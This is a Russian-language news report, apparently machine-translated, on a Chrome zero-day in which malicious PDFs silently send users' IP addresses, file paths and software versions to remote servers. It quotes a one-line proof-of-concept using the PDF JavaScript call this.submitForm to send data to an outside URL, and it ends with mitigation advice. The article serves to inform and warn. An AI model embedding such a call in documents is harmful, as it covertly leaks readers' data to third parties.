Служба обнаружения эксплойтов EdgeSpot обнаружила интригующую уязвимость Chrome нулевого дня, использующую документы PDF. Уязвимость позволяет злоумышленникам собирать конфиденциальные данные, используя вредоносные документы PDF, открытые в Chrome.

Как только жертва открывает соответствующие файлы PDF в Google Chrome, вредоносная программа начинает работать в фоновом режиме, собирая пользовательские данные.

Затем данные передаются на удаленный сервер, который контролируется хакерами. Вам может быть интересно узнать, какие данные высасываются злоумышленниками, они нацелены на следующие данные на вашем ПК:

• айпи адрес
• Полный путь к файлу PDF в системе
• Версии для ОС и Chrome

Остерегайтесь вредоносных PDF-файлов

Вы можете быть удивлены, узнав, что ничего не происходит, когда Adobe Reader используется для открытия PDF-файлов. Кроме того, HTTP POST-запросы используются для передачи данных на удаленные серверы без какого-либо вмешательства пользователя.

Эксперты заметили, что один из двух доменов readnotifycom или burpcollaboratornet получает данные.

Вы можете представить себе интенсивность атаки, если учесть тот факт, что большинство антивирусных программ не может обнаружить образцы, обнаруженные EdgeSpot.

Эксперты выясняют, что злоумышленники используют API-интерфейс «this.submitForm ()» PDF Javascript для сбора конфиденциальной информации пользователей.

Мы протестировали его с минимальным PoC, простой вызов API, такой как «this.submitForm ('http://google.com/test')», заставит Google Chrome отправлять личные данные на google.com.

Эксперты фактически обнаружили, что эта ошибка Chrome использовалась двумя различными наборами вредоносных PDF-файлов. Оба они были распространены в октябре 2017 года и сентябре 2018 года соответственно.

В частности, собранные данные могут быть использованы злоумышленниками для точной настройки атак в будущем. Отчеты предполагают, что первая партия файлов была скомпилирована с использованием службы отслеживания PDF ReadNotify.

Пользователи могут использовать сервис для отслеживания просмотров пользователей. EdgeSpot не поделился какими-либо подробностями относительно характера второго набора файлов PDF.

Как оставаться защищенным

Служба обнаружения эксплойтов EdgeSpot хотела предупредить пользователей Chrome о потенциальных рисках, поскольку ожидается, что исправление не будет выпущено в ближайшем будущем.

EdgeSpot сообщил Google об этой уязвимости в прошлом году, и компания пообещала выпустить патч в конце апреля. ЧАС

тем не менее, вы можете использовать временное решение проблемы, локально просматривая полученные документы PDF с помощью альтернативного приложения для чтения PDF.

Кроме того, вы также можете открыть свои документы PDF в Chrome, отключив свои системы от Интернета. Между тем, вы можете дождаться обновления Chrome 74, которое ожидается 23 апреля.